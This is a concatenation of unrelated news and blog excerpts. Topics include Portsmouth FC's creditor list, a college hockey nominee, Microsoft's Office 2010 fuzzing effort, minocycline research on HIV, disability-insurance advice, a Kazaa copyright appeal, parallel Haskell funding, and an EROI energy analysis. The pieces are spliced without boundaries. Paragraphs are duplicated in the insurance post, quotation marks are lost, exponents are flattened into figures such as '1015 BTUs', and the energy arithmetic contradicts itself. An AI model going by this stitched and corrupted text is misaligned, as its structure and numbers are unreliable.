It makes up part of the £ 17.3 m owed in current and future instalments on players including Sulley Muntari , Mike Willliamson and Nadir Belhadj .
Portsmouth are obliged to pay the fee because of Premier League and Football League rules that protect football creditors , while unsecured creditors will be offered a settlement .
Current and former players including David James , Peter Crouch and Glen Johnson are owed a total of £ 1.87 m in unpaid wages and bonuses .
A list of more than 400 trade creditors , including St John Ambulance , schools , community sports clubs , kit suppliers and local businesses including florists and builders , are collectively owed £ 4.37 m .
Agents and scouts are owed £ 9.76 m , including £ 2.045 m to the agent who negotiated the sale of Lassana Diarra to Real Madrid and £ 2.07 m to Pini Zahavi .
Andronikou will ask the club 's unsecured creditors , including HMRC , to vote on a Company Voluntary Arrangement that would see them receiving a fraction of what they are owed .
HMRC , which issued a winding - up order against the club in October after becoming increasingly frustrated at serial non-payment , is now owed £ 17.1 m .
It will oppose the CVA only if it feels it has a realistic chance of blocking it .
In total , the unsecured creditors are owed £ 92.7 m , including the sums owed to the former owners Sacha Gaydamak ( £ 31.5 m ) , Ali al - Faraj 's Falcondrone ( £ 1.8 m ) and Sulaiman al - Fahim ( £5 m ) .
Andronikou said that all creditors would have to provide evidence that they were owed the money that was booked in the club 's accounts .
" We are asking all creditors to complete proof of debt forms , confirm how much they are owed and provide evidence .
The Gaydamak trust and family will be required to provide evidence of the amount owing .
We are asking them to prove their claim , " he said .
" At the moment , we have extracted that information from the books and records of the club .
Until someone can't prove their debt , that 's the situation . "
Creditors are expected to be offered between 20 p and 25 p in the pound across three to five years , although Andronikou refused to be drawn on what the final offer – to be put to unsecured creditors on 6 May – will be .
It requires the backing of 75 % of unsecured creditors by value .
Balram Chainrai , the club 's fourth owner of a tumultuous season , is owed £ 14.2 m and will not be included in the CVA because his loan to the club was secured on the ground .
He is expected to be paid in full , either from forthcoming TV revenues and parachute payments or when the club is sold .
All domestic football creditors ( players and clubs ) will also have to be paid in full under the football creditors rule , and are also likely to be done so out of future parachute payments from the Premier League .
The report 's appendix also details how spending at the club spiralled out of control in the Gaydamak era as the club went from a pre-tax loss of £ 912,397 in 2006 to £ 23.4 m in 2007 , £ 16.9 m in 2008 and £ 13.47 m in 2009 .
According to 2009 's draft accounts , the club 's overall staff costs – mainly accounted for by players ' wages – were an astonishing 109 % of revenues .
Andronikou said the club's £ 3.3 m a month wage bill would have to be slashed at the end of the season in order to cut its overheads to an acceptable level for the Championship .
He said the CVA would be self financing and he had n't yet had to dip into the £ 15 m facility provided by Chainrai to fund the administration .
Engineers freshman forward one of three nominees for this year 's honor
TROY , NY – ECAC Hockey has announced its finalists for the 2009 - 10 Men 's Rookie of the Year Award and Rensselaer Polytechnic Institute ( RPI ) student - athleteis one of three nominees in the running for the honor .
The winner of this year 's award will be announced by the league next week .
Other finalists for the Rookie of the Year Award include Union College 's Keith Kinkaid and Harvard University 's Louis LeBlanc .
D'Amigo , a forward from Binghamton , N.Y. , played in 35 games , tallying 10 goals and 24 assists for 34 points .
He was third on the team in points , second in assists and fourth in goals .
Three of his goals came on the power play , while one was shorthanded and a team - high three were game - winners .
In 21 league games , D'Amigo scored seven goals with 17 assists for 24 points .
He was second in freshman scoring ( 1.14 points per game ) , third in overall shorthanded points ( 1 goal , 1 assist ) and sixth in overall assists per game ( 0.81 ) .
Nationally he ranks fourth in rookie points and fifth in points per game by a rookie ( 0.97 ) .
A sixth - round ( 158th overall ) draftee by the Toronto Maple Leafs in the 2009 National Hockey League ( NHL ) Entry Draft , D'Amigo was named to the ECAC Hockey All - Rookie Team and was a two - time Weekly Honor Roll selection this season .
D'Amigo missed four games while playing for the United States World Junior Championship Team .
He led that team to a gold medal by scoring 12 points ( 6 goals , 6 assists ) to rank second in the tournament and on the team .
He was first on the U.S. squad in goals and third in assists with a plus - 7 .
D'Amigo was the team 's Player of the Game twice and had multiple - point efforts in each of the three games in the medal round .
Prior to arriving at Rensselaer , D'Amigo was a standout on the U.S. Under - 18 National Development Team , where he posted 23 goals and 33 assists for 56 points in 53 games .
He helped lead that squad to a gold medal at the U.S. World Championships and was named to the All - Tournament Team after leading the team in scoring with 13 points ( 4 goals , 9 assists ) .
D'Amigo also played for the U.S. National Under - 17
Team in 2007 - 08 , where he served as an assistant captain and was the only player on the squad to play in all 64 games .
Rensselaer concluded its season with an 18 - 17 - 4 record , including a 10 - 9 - 3 mark in ECAC Hockey .
The Engineers advanced to the conference playoffs before being eliminated by Brown .
More than 7000 people were killed in drug- related violence in Mexico in 2009 and 2010 has already got off to a gruesome and bloody start .
The man who runs Mexico ’s most powerful drugs cartel , Chapo Guzman , continues to elude capture .
Ranked as one of the world ’s richest and most powerful men , Guzman ’s exploits are glorified in folk songs and his recent wedding was allegedly attended by senior Mexican officials .
For Assignment Katya Adler exposes the culture of impunity and the shocking consequences of the drug wars on Mexican society .
Show less
As anyone who has ever waded into a message board flame - war knows , comic books can provoke a pretty strong emotional reaction .
Whether it's a fist - pump of joy , a groan of disgust , or a phone call to a friend saying they 've got to read the new comic , every comic reader 's had moments where they 've reacted to their books out loud .
tweetmeme_url = ' http://comicsalliance.com/2010/03/10/renaming-comics-titles/'; tweetmeme_source = ' ComicsAlliance ' ; digg_url = ' http://digg.com/comics_animation/Renaming_Comics_As_What_You_Really_Say_About_Them_PICS#comment-reply';
So what if comics were actually given titles based on what you said when you read them ?
ComicsAlliance senior writer Chris Sims has a few ideas :
Microsoft uncovered more than 1,800 bugs in Office 2010 by tapping into the unused computing horsepower of idling PCs , a company security engineer said today .
Office developers found the bugs by running millions of " fuzzing " tests , said Tom Gallagher , senior security test lead with Microsoft 's Trustworthy Computing group .
Fuzzing , a practice employed by both software developers and security researchers , searches for flaws by inserting data into file format parsers to see where programs fail by crashing .
Because some crash bugs can be further exploited to successfully hack software , allowing an attacker to insert malicious code , fuzzing is of great interest to both legitimate and criminal researchers looking for security vulnerabilities .
" We found and fixed about 1,800 bugs in Office 2010 's code , " said Gallagher , who last week co-hosted a presentation on Microsoft 's fuzzing efforts at the CanSecWest security conference in Vancouver , British Columbia .
" While a large number , it 's important to note that that does n't mean we found 1,800 security issues .
We also want to fix things that are not security concerns . "
Gallagher declined to quantify the number of flaws found via fuzzing that qualified as vulnerabilities , saying only that the Office 2010 team did uncover security bugs in the process and patched them during development .
Some of those vulnerabilities have already been addressed in older editions of Office , Gallagher added , because information obtained by fuzzing Office 2010 code was checked against the code in earlier versions -- such as Office 2007 and Office 2003 -- then patched during Office 2010 's development .
Non-security bugs discovered in Office 2010 that also exist in previous editions will be fixed in those versions ' upcoming service packs , Gallagher said .
Microsoft was able to find such a large number of bugs in Office 2010 by using not only machines in the company 's labs , but also under- utilitized or idle PCs throughout the company .
The concept is n't new : The Search for Extraterrestrial Intelligence ( SETI@home ) project may have been the first to popularize the practice , and remains the largest , but it's also been used to crunch numbers in medical research and to find the world 's largest prime number .
" We call it a botnet for fuzzing , " said Gallagher , referring to what Microsoft has formally dubbed Distributed Fuzzing Framework ( DFF ) .
The fuzzing network originated with work by David Conger , a software design engineer on the Access team .
Client software installed on systems throughout Microsoft 's network automatically kicks in when the PCs are idle , such as on weekends , to run fuzzing tests " We would do millions of [ fuzzing ] iterations each weekend , " Gallagher said -- up to 12 million in some cases .
The difference between Microsoft 's old way of fuzzing -- which involved a tester setting up a fuzzer on a single machine , then letting it run for as long as a week -- and DFF was dramatic , said Gallagher .
" We can do 12 million iterations without a lot of effort , " he said .
" Set it up , go home , come in on Monday , and we have the results listing all the issues .
What used to take days now just takes an hour . "
While all the Office development teams use DFF , only some groups within the company have tried it .
Currently SharePoint , MSN client and Fast search teams are utilizing the fuzzing network , but Windows developers are not .
A prominent vulnerability researcher , however , has criticized the fuzzing efforts of Microsoft , Apple and Adobe .
Last week , Charlie Miller , three - time winner at the Pwn2 Own hacking contest , showed CanSecWest attendees how he used a simple " dumb " fuzzer -- one not built to understand a specific file format -- to root out 20 security vulnerabilities and hundreds of crash bugs using fewer than five computers .
Miller found vulnerabilities in PowerPoint , the presentation maker in Office , as well as in Mac OS X , Apple 's Safari browser and Adobe 's Reader .
Miller refused to turn over details of the vulnerabilities to the vendors , Microsoft included , but instead showed the vendors how to replicate his work in his own presentation .
" What I can do is tell them how to find these bugs , and do what I did .
That might get them to do more fuzzing , " Miller said last week in an interview with Computerworld .
Gallagher , who sat in on Miller 's presentation , did n't commit Microsoft to doing what Miller wanted .
" We 're looking at his technique , how to duplicate it and how we might implement it , " Gallagher said today .
Miller was unavailable today to comment on Microsoft 's Office fuzzing work .
Microsoft 's stepped - up fuzzing was part of a security push for Office 2010 that also added several new features , including a more flexible file blocker -- first introduced in Office 2007 -- and a new sandbox dubbed Protected View that isolates suspicious Word , Excel and PowerPoint files in a limited - rights environment , effectively quarantining them from the rest of the PC .
" We 're not banking on finding and fixing every bug in Office 2010 , " Gallagher admitted .
Gregg Keizer covers Microsoft , security issues , Apple , Web browsers and general technology breaking news for Computerworld .
Follow Gregg on Twitter at @gkeizer or subscribe to Gregg 's RSS feed .
His e-mail address is gkeizer@ix.netcom.com .
Johns Hopkins scientists have found that a safe and inexpensive antibiotic in use since the 1970s for treating acne effectively targets infected immune cells in which HIV , the virus that causes AIDS , lies dormant and prevents them from reactivating and replicating .
The drug , minocycline , likely will improve on the current treatment regimens of HIV - infected patients if used in combination with a standard drug cocktail known as HAART ( Highly Active Antiretroviral Therapy ) , according to research published now online and appearing in print April 15 in The Journal of Infectious Diseases .
" The powerful advantage to using minocycline is that the virus appears less able to develop drug resistance because minocycline targets cellular pathways not viral proteins , " says Janice Clements , Ph.D. , Mary Wallace Stanton Professor of Faculty Affairs , vice dean for faculty , and professor of molecular and comparative pathobiology at the Johns Hopkins University School of Medicine .
" The big challenge clinicians deal with now in this country when treating HIV patients is keeping the virus locked in a dormant state , " Clements adds .
" While HAART is really effective in keeping down active replication , minocycline is another arm of defense against the virus . "
Unlike the drugs used in HAART which target the virus , minocycline homes in on , and adjusts T cells , major immune system agents and targets of HIV infection .
According to Clements , minocycline reduces the ability of T cells to activate and proliferate , both steps crucial to HIV production and progression toward full blown AIDS .
If taken daily for life , HAART usually can protect people from becoming ill , but it 's not a cure .
The HIV virus is kept at a low level but is n't ever entirely purged ; it stays quietly hidden in some immune cells .
If a person stops HAART or misses a dose , the virus can reactivate out of those immune cells and begin to spread .
The idea for using minocycline as an adjunct to HAART resulted when the Hopkins team learned of research by others on rheumatoid arthritis patients showing the anti-inflammatory effects of minocycline on T cells .
The Hopkins group connected the dots between that study with previous research of their own showing that minocycline treatment had multiple beneficial effects in monkeys infected with SIV , the primate version of HIV .
In monkeys treated with minocycline , the virus load in the cerebrospinal fluid , the viral RNA in the brain and the severity of central nervous system disease were significantly decreased .
The drug was also shown to affect T cell activation and proliferation .
advertisement
" Since minocycline reduced T cell activation , you might think it would have impaired the immune systems in the macaques , which are very similar to humans , but we did n't see any deleterious effect , " says Gregory Szeto , a graduate student in the Department of Cellular and Molecular Medicine working in the Retrovirus Laboratory at Hopkins .
" This drug strikes a good balance and is ideal for HIV because it targets very specific aspects of immune activation . "
The success with the animal model prompted the team to study in test tubes whether minocycline treatment affected latency in human T cells infected with HIV .
Using cells from HIV - infected humans on HAART , the team isolated the " resting " immune cells and treated half of them with minocycline .
Then they counted how many virus particles were reactivated , finding completely undetectable levels in the treated cells versus detectable levels in the untreated cells .
" Minocycline reduces the capability of the virus to emerge from resting infected T cells , " Szeto explains .
" It prevents the virus from escaping in the one in a million cells in which it lays dormant in a person on HAART , and since it prevents virus activation it should maintain the level of viral latency or even lower it .
That 's the goal : Sustaining a latent non-infectious state . "
The team used molecular markers to discover that minocycline very selectively interrupts certain specific signaling pathways critical for T cell activation .
However , the antibiotic does n't completely obliterate T cells or diminish their ability to respond to other infections or diseases , which is crucial for individuals with HIV .
" HIV requires T cell activation for efficient replication and reactivation of latent virus , " Clement says , " so our new understanding about minocyline 's effects on a T cell could help us to find even more drugs that target its signaling pathways . "
The research was supported by grants from the National Institutes of Health .
Authors of the paper , in addition to Clements and Szeto , are Angela K. Brice , Sheila A. Barber and Robert F. Siliciano , all of Johns Hopkins .
Also , Hung - Chih Yang of National Taiwan University Hospital .
When I found out that I was going to be a father , I started to think a lot about how I would provide for my family in the event that I were to die , or to become disabled .
A week or so ago I wrote about how I ’m currently looking for the best term life insurance for my situation .
I ’m also looking into buying some good long term disability insurance as well because if I become disabled , I wo n’t receive life insurance , but I ’ll still need to provide for my family .
Today I thought I ’d talk a bit about long term disability insurance , how it works , what to look for , and what kind you should buy .
Looking for good long term disability insurance ?
Check out what Breeze has to offer .
From online quote to policy in as little as 15 minutes !
Breeze Long Term Disability Insurance .
Before we get started , I thought I would share this audio clip from the Dave Ramsey Show .
In the clip Dave Ramsey talks with a caller about why long term disability insurance is so important .
Long Term Disability Insurance – Do I Need It ?
In my opinion everyone should probably consider buying long term disability insurance .
If you were to become disabled during your working career , you will still have expenses to pay for .
If , however , you no longer have an income to rely on , you ’ll be left high and dry .
That ’s where long term disability insurance comes in .
While I was doing some reading up on long term disability insurance I found an article on GoodFinancialCents.com that quoted the following stats :
From the Life and Health Insurance Foundation for Education , November 2005 :
If you are between the ages of 25 and 55 , you are more likely to become disabled that die
60 - percent chance at ages 30 , 40 and 50 that one in a group of five people will suffer a long - term disability before age 65 .
There is a 1 in 3 shot that before they age of 35 , that will be disabled for more than 3 months during the rest of your working days .
Another study sponsored by the Social Security Administration found that :
A 20 - year - old worker has a 3 - in - 10 chance of becoming disabled before reaching retirement age .
The numbers should be a sobering wake - up call that disability insurance really is an important part of a financial plan .
So , where should you look for coverage ?
Where Do I Get It Disability Insurance ?
There are a variety of places that you can go to get disability insurance , and depending on who you buy it through your rates can vary drastically .
Some of the options :
Employer :
Many employers offer a company sponsored group plan that you can take advantage of .
Because the insurance is offered at group rates you can save quite a bit .
The options can be limited , however .
For example , at my place of employment they only offer short term disability insurance , and it is tied to employment .
: Many employers offer a company sponsored group plan that you can take advantage of .
Because the insurance is offered at group rates you can save quite a bit .
The options can be limited , however .
For example , at my place of employment they only offer short term disability insurance , and it is tied to employment .
Professional Associations :
If you ’re a part of a professional group or association , often they offer a discounted group rate on insurance of different kinds , sometimes including disability insurance .
: If you ’re a part of a professional group or association , often they offer a discounted group rate on insurance of different kinds , sometimes including disability insurance .
Independent Insurance Broker Or Agency :
If you do n’t have an option to buy through your work or other group , you can get insurance through an independent agency or broker .
Breeze , Policy Genius and others have options that you can look into online .
Do your homework and you can find a policy that fits your needs , and that does n’t break the bank .
How Much Disability Insurance Coverage Should I Get ?
One thing you ’ll need to figure out when buying long term disability insurance is how much money you ’ll need to cover your expenses if you do become disabled .
If you ’re already doing a zero based budget , you probably know what your fixed monthly expenses are .
Based on the figure you come up with you ’ll need to find a policy that covers that amount .
Long term disability insurance plans are usually limited to 75 % of your income , but different policies will have different payment amounts .
Be sure to find out what your policy pays out , and if it is n’t enough to cover your expenses , you may want to keep looking , or buy additional coverage .
If your policy pays out at 75 % of your income and you made $ 4000 / month before your disabling event , you would then receive $ 3000 / month from your insurance policy .
You will pay a premium on your policy that is based on your age , occupation , health and other factors .
You may need to undergo a physical exam before a policy is written .
Many policies are also capped at a certain payout amount , so be sure to ask about that when shopping around .
Disability Insurance Elimination Period
The cost of your insurance policy will depend on a variety of factors , one of which is the elimination period .
The elimination period is how long you choose to wait before receiving benefits .
For example , if you choose a policy that has a 3 month elimination period , you ’ll probably pay more than if you have a 6 month elimination period .
If you ’ve planned ahead and have an emergency fund of 3 - 6 months as suggested by Dave Ramsey and others , you should be OK in choosing a longer elimination period for your disability insurance , and in return have lower rates .
Choose the highest elimination period you feel comfortable with .
How Is Disability Defined By Your Policy ?
When you buy your insurance policy you need to be sure what type of a policy you ’re buying , and how disability is defined b your policy .
Depending upon the policy you may or may not be covered for certain disabling situations .
Here are the different definitions of disability :
Own occupation .
The most comprehensive definition of disability , this type of policy pays benefits if you are n’t able to perform the material and substantial duties of your own occupation due to sickness or injury , even if you are able to do some other kind of work .
It ’s a common misconception that this type of insurance always costs more , which is n’t necessarily the case ( although it may be )
.
The most comprehensive definition of disability , this type of policy pays benefits if you are n’t able to perform the material and substantial duties of your own occupation due to sickness or injury , even if you are able to do some other kind of work .
It ’s a common misconception that this type of insurance always costs more , which is n’t necessarily the case ( although it may be ) Income replacement .
Policies with income replacement coverage define disability as sickness or injury that does n’t allow you to perform the duties of your occupation and typically stipulates that you are not currently engaged in any other occupation .
.
Policies with income replacement coverage define disability as sickness or injury that does n’t allow you to perform the duties of your occupation and typically stipulates that you are not currently engaged in any other occupation .
Gainful occupation .
These policies define disability as the inability to perform the material and substantial duties or your occupation , or any occupation for which you are deemed reasonably qualified by education , training , or experience .
Be sure you know which type of insurance you ’re buying when you look around .
Personally I ’ll be looking only for a policy with “ own- occupation ” coverage .
When Should I Buy Coverage ?
Realistically you can have a disabling event at any time in your working career .
Looking at the stats we quoted earlier in this article should really be an eye opener , I know it was for me !
In my opinion it ’s a good idea to have long term disability coverage as soon as you start working , and especially if you have others who are depending upon your income .
Here are a couple of places to get started :
What do you think about long term disability insurance ?
Do you currently have coverage ?
If so , what kind do you have ?
If you do n’t have coverage , why not ?
Tell us your thoughts in the comments !
Judge delays release of Breonna Taylor grand jury recordings
Kentucky Attorney General Daniel Cameron says a delay is needed to protect the personal information of witnesses in the grand jury proceeding .
Roman and Iron Age remains have been found at Silchester
In pictures : Romans in Silchester Evidence found at the Roman site of Silchester could mean it was the site of one of Boudicca 's battles .
Professor Michael Fulford said that 13 years of excavations at Calleva had revealed evidence of the first gridded Iron Age town in Britain .
The site also bears the scars of possible early Roman military occupation , and evidence of later , widespread burning and destruction .
This suggests the site could have been destroyed at the hands of Boudicca .
Queen Boudicca waged war against the Romans in Britain from 60 AD after the Romans decided to rule the Iceni directly and confiscated the property of the leading tribesmen .
Boudicca 's warriors successfully defeated the Roman Ninth Legion and destroyed the capital of Roman Britain , then at Colchester .
They went on to destroy London and Verulamium ( St Albans ) .
Thousands were killed .
Finally , Boudicca was defeated by a Roman army led by Paulinus .
Many Britons were killed and Boudicca is thought to have poisoned herself to avoid capture .
The site of the battle , and of Boudicca 's death , are unknown .
Iceni warriors may have laid waste to Silchester Professor Fulford said that in excavations at Silchester they had found evidence of a major military occupation at Calleva ( now called Silchester ) in 40 AD , then destruction between 60 and 80 AD , including wells that were filled in at this time and burned buildings .
" The settlement is completely wiped out somewhere between 60 AD and 80 AD , and it starts again in 70 AD , " he said .
Although Calleva is not mentioned in historical sources concerning Boudicca , it is known that she waged war at St Albans and London , just 50 mile away .
" Winchester became an important military location for the Romans and so was Silchester , " said Professor Fulford , urging more people interested in Roman history to learn about the site .
" There 's more to see at Silchester than there is at Winchester . "
The University of Reading 's Department of Archaeology has been excavating and researching a central area of Calleva Atrebatum ( Silchester ) since 1997 .
Professor Fulford will be holding a free lecture at 2000 GMT on Tuesday 27 April at 2000 in the Palmer lecture theatre on the University of Reading 's Whiteknights Campus .
For further information please contact Laura Walsh at events@reading.ac.uk or by telephone on 0118 378 4313 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The Kojima Productions man predicted that console gamers should have their fix " on the go " in the future , perhaps a reaction to the current gaming trends in Kojima 's native Japan .
 In the near future , well have games that dont depend on any platform ,  predicted Kojima .
 Gamers should be able to take the experience with them in their living rooms , on the go , when they travel  wherever they are and whenever they want to play .
It should be the same software and the same experience . 
But to counter , SCEJ boss Hiroshi Kawano said Kojima 's prediction was a " bold one " .
" We hope he continues to develop for platforms , but we deeply respect his sense of taking on a challenge ,  he said .
The day gaming turns into a social network driven unified platform experience is the day we close down this site and get a real job .
For real .
Of all the songs Whitney Harper of San Antonio downloaded from online file - sharing networks , the one that could best sum up the college student 's situation now is Hanson 's “ Save Me . ”
A federal appeals court that covers Texas has ruled the 22 - year - old must pay a total of $ 27,750 to five music companies for 37 copyrighted songs she accessed through Kazaa and similar sites when she was a teenager .
Last week 's opinion by a three - judge panel of the 5th U.S. Circuit Court of Appeals overturned a lower ruling that awarded the five recording companies $ 200 for each of the songs .
The appeals court said Harper instead must pay $ 750 for each song .
Harper was unavailable for comment .
Her lawyer , Donald Scott Mackenzie of Dallas , said the total with interest could well exceed $ 40,000 and force Harper to file for bankruptcy .
Mackenzie said other lawyers have shown interest in the case , and it could head up the appellate ladder , even to the U.S. Supreme Court .
More for you Entertainment Justices interested in S.A. case
He said Harper is about to graduate from Texas Tech with a degree in business communications , and the case has left a cloud over her .
“ She 's already been denied jobs because of this federal case , ” Mackenzie said .
“ This has already impacted her . ”
Harper , who was on the cheerleading squad at Alamo Heights High , is one of the few to challenge the recording industry , which sues people who download copyrighted music .
Many of the defendants are college students or teens who end up settling or lose by default because they have no money to challenge the recording industry 's deep pockets , according to lawyers familiar with the issue .
The Recording Industry Association of America , the music industry 's lobby , said it and its members had no comment .
Mackenzie said this case should make parents aware of what their kids are looking at on the Internet because it could end up costing them .
The companies initially sued Harper 's father but amended the suit after learning she downloaded the music on a family computer .
“ The record industry taught her a lesson , ” Mackenzie said sarcastically .
“ They made an example of her .
“ Her family and her are adamant that this is a ridiculous outrage . ”
Harper was 16 years old , or possibly even 14 , when she accessed the songs , Mackenzie said .
At the time , Harper said in a court affidavit , she 'd never received computer training , and her skills were limited to e-mail and Web browsing .
Harper said she was directed by friends or online advertising to sites such as Kazaa .
“ I visited those sites and from viewing the Web pages of those sites , I understood Kazaa and similar products to be legitimate music sites that allowed a person to listen to music on their computer , ” Harper 's affidavit said .
“ Many of these sites advertised that this was 100 percent free and 100 percent legal which I had no reason to doubt . ”
In 2008 , U.S. District Judge Xavier Rodriguez found Harper infringed , but said it was up to a jury to decide whether the act was “ innocent ” — whether she was truly aware that her acts constituted copyright infringement .
If the infringement is found to be innocent , that can reduce the amount per song from $ 750 to $ 200 .
Rather than put the matter to a jury , the plaintiffs — Maverick Recording Co. ; UMG Recordings Inc. ; Arista Records LLC ; Warner Bros. Records Inc. ; and Sony BMG Music Entertainment — opted to accept a ruling stating they could collect $ 200 for each of the 37 songs .
But , if she appealed , they reserved the right to ask for the full $ 750 per song , records show .
Harper appealed , and the companies sought the full $ 750 .
Harper argued on appeal , among other things , that she was too young and naïve to know that what she was doing was illegal .
The appeals panel dismissed her arguments , including the “ innocent infringement ” defense , saying , in part , that copyright infringement warnings existed when the music was first recorded , such as onto CD .
GHC HQ and Well - Typed are very pleased to announce a 2 - year project funded by Microsoft Research to push the real - world adoption and practical development of parallel Haskell with GHC .
We are seeking organisations to take part : read on for details .
In the last few years GHC has gained impressive support for parallel programming on commodity multi-core systems .
In addition to traditional threads and shared variables , it supports pure parallelism , software transactional memory ( STM ) , and data parallelism .
With much of this research and development complete , and more on the way , the next stage is to get the technology into more widespread use .
This project aims to do the engineering work to solve whatever remaining practical problems are blocking organisations from making serious use of parallelism with GHC .
The driving force will be the applications rather than the technology .
We will work in partnership with a small number of commercial or scientific users who are keen to make use of parallel Haskell .
We will work with these partners to identify the issues , major or minor , that are hindering progress .
The project is prepared to handle system issues , covering everything from compiler and runtime system through to more mundane platform and tool problems .
Meanwhile our partners will contribute their domain - specific expertise to use parallel Haskell to address their application .
We are now seeking organisations to take part in this project .
Organisations do not need to contribute financially but should be prepared to make a significant commitment of their own time .
We expect to get final confirmation of the project funding in June and to start work shortly thereafter .
Well - Typed will coordinate the project , working directly with both the participating organisations and the Simons at GHC HQ .
If you think your organisation may be interested then get in touch with me , Duncan Coutts , via info@well-typed.com .
The first section of this post discusses how the economic cost of energy changes with changes in the price of energy .
The second section discusses the impact of declining EROI on economies ; specifically this section addresses whether or not the time trend of EROI supports the claim by some economists that advances in technology will overcome the depletion of fossil fuels .
The third section discusses how surplus energy is used to run the economy by analyzing a simplified economy that is powered by oil only .
2.2. Economic Cost of Energy
In real economies , energy comes from many sources – from imported and domestic sources of oil , coal and natural gas , as well as hydropower and nuclear , and from a little renewable energy – most of that as firewood but increasingly from wind etc .
Most of these are cheaper per unit energy delivered than oil .
So let ’s look at what this real ratio of the cost of energy ( from all sources , weighed by their importance ) is relative to its benefits .
Economic cost of energy =
Dollars to buy energy / GDP
By this token the relation of the proportional energy cost in dollars is similar , as we shall see , to the proportional energy cost in joules ; in 2007 roughly 9 percent ( 1 trillion dollars ) of the U.S. GDP was spent by final demand for all kinds of energy in the US economy to produce the 12 trillion dollars worth of total GDP ( Figure 1 ) .
This ratio certainly increased in the first half of 2008 as the price of oil exceeded $ 140 a barrel and then fell again .
The abrupt rise in the 1970s , subsequent decline through 2000 , and increase again through mid 2008 of this value had large impacts on discretionary spending because the 5 to 10 percent change in total energy cost would come mainly out of the 25 or so percent of the economy that is discretionary spending .
Thus we believe that changes in energy prices have very large economic impacts .
At least thus far the changes in price seem to reflect the generally decreasing EROI only sporadically although that seemed to be changing recently until the economic crash of fall 2008 , when collapsing demand took over .
What future prices will be is anyone ’s guess but even as economies crash there is a great deal of information implying that dollar , and hence presumably energy , costs of fuels are increasing substantially .
Our guess is that declining EROI will take a huge economic toll in the future [ 6 ] .
Figure 1 . Percentage of GDP that is spent on energy by final consumers ( 2006 - 2008 estimated ) .
2.3. EROI for U.S. and North American Domestic Resources and Its Implications for the “ Minimum EROI ”
In the past the first author worked with Cutler Cleveland and Robert Kaufmann to define and calculate the energy return on investment ( EROI ) of the most important fuels for the United States ’ economy .
Since that time Cleveland has undertaken additional and updated analyses for the US economy and Nate Gagnon and Hall have attempted to do that for the world average .
Our results indicate that there is still a very large energy surplus from fossil fuels -- variously estimated as an EROI ( i.e. EROI mm ) from perhaps 80 to one ( domestic coal ) to perhaps 11 - 18 to one ( US ) to 20 to one ( World ) for contemporary oil and gas .
In other words , globally for every barrel of oil , or its equivalent , invested in seeking and producing more oil some 20 barrels are delivered to society .
Thus fossil fuels still provide a very large energy surplus , obviously enough to run and expand the human population and the very large and complex industrial societies around the world .
This surplus energy of roughly 20 or more units of energy returned per unit invested in getting it , plus the large agricultural yields generated by fossil - fueled agriculture , allows a huge surplus quantity of energy , including food energy , delivered to society .
This in turn allows most people and capital to be employed somewhere else other than in the energy industry .
In other words these huge energy surpluses have allowed the development of all aspects of our civilization -- both good and bad .
That ’s the good news .
The bad news is that the depletion of fossil fuels has been occurring since the first ton of coal or barrel of oil was mined , since these fuels need about 100 or so million years to regenerate .
Many economists argue that technology , the market and economic incentives will continue to find oil to replace that which we have extracted , or that prices will increase as oil reserves deplete and society will substitute away from oil as technologies are developed that allow for such a substitution [ 21 ] .
Thus one can argue that depletion and technology are in a race over time .
Which is winning ?
We argue that one can determine this from the time trend of EROI .
The EROI for oil in the US during the heydays of oil development in Texas , Oklahoma and Louisiana in the 1930s was about 100 returned for one invested [ 22 ] .
During the 1970s it was about 30:1 , and for about 2000 it was from 11 to 18 returned per one invested [ 3 , 4 , 22 ] .
For the world the estimate was about 35:1 in the late 1990s declining to about 20:1 in the first half decade of the 2000s ( Gagnon et al. in preparation ) .
In addition there is considerable evidence that , in the case of oil , we are mostly just pumping out old fields rather than replacing extracted oil with newly found oil .
Globally we are using between 2 to 3 barrels for each new barrel found [ 23 ] .
The analysis of Gagnon et al. suggests that if current trends continue linearly then in about two to three decades it will take one barrel of petroleum to find and produce one barrel of petroleum , and oil and eventually gas will cease to be a net source of energy .
( A special case can be made for e.g. tar sands , where it may make sense to extract two barrels from the ground , use one for the process and then deliver the second barrel to society ) .
This also means that the question is not necessarily what the size of global oil reserves is but rather what is the size of that portion that is extractable with a positive net energy value and at what rate the high EROI fuels can be produced .
The implications of this are obvious and huge , and help make an argument for seeking possible substitutes earlier rather than later [ 6 ] .
But the problem with substitutes to fossil fuels is that of the alternatives available none appear to have the desirable traits of fossil fuels .
These include : 1 ) sufficient energy density 2 ) transportability 3 ) relatively low environmental impact per net unit delivered to society 4 ) relatively high EROI and 5 ) are obtainable on a scale that society presently demands ( Figure 2 ) .
Thus it would seem that society , both the US and the world , is likely to be facing a decline in both the quantity and EROI of its principal fuels .
Our next question is “ what are the implications of this ? ”
Figure 2 . “ Balloon graph ” representing quality ( EROI – Y axis ) and quantity ( X axis ) of the United States economy for various fuels at various times .
Arrows connect fuels from various times ( i.e. domestic oil in 1930 , 1970 , 2005 – “ today ” ) , and the size of the “ balloon ” represents part of the uncertainty associated with EROI estimates , i.e. larger “ balloons ” represent more uncertainty .
The horizontal line indicates that there is some minimum EROI that is needed to make society work , and the vertical line to the left indicates one estimate of maximum forestry potential and the vertical line to the right is David Pimentel ’s earlier estimate of total photosynthesis in the United States ( Source : US EIA , Cutler Cleveland and C. Hall ’s own EROI work in preparation ) .
( Reprinted with minor changes from [ 6 ] ) .
3 . The surplus available to run the rest of the economy
We first generate a simplistic view of the economy in every day units to try to develop for the reader an explanation of how an economy obtains the energy needed for its own function and how differences in EROI might affect that .
Assume for the moment that the United States ’ economy runs 100 percent on domestic oil , and that energy itself is not what is desired by the final consumer but rather the goods and services derived from the general economy .
In the early years of this new millennium the U.S. Gross Domestic Product ( proxy variable for the size of the U.S. economy ) was about 12 trillion dollars , and it used about 100 quadrillion BTUs ( called Quads , equal to 1015 BTUs ) , which is equivalent to about 105 ExaJoules ( 1 EJ equals 1018 Joules ) .
Dividing the two we find that we use an average of about 8.7 Mega Joules ( 1 MJ equals 106 joules ) to generate one dollar ’s worth of goods and services in 2005 .
By comparison , gasoline at $ 3 per gallon delivers about 44 MJ per dollar ( at 130.8 MJ per gallon of gasoline ) , plus roughly another ten percent to get that gasoline ( refinery cost ≈ 4 MJ ) , so if you spend one dollar on energy directly vs. one dollar on general economic activity you would consume about 48 / 8.3 or 5.8 times more energy .
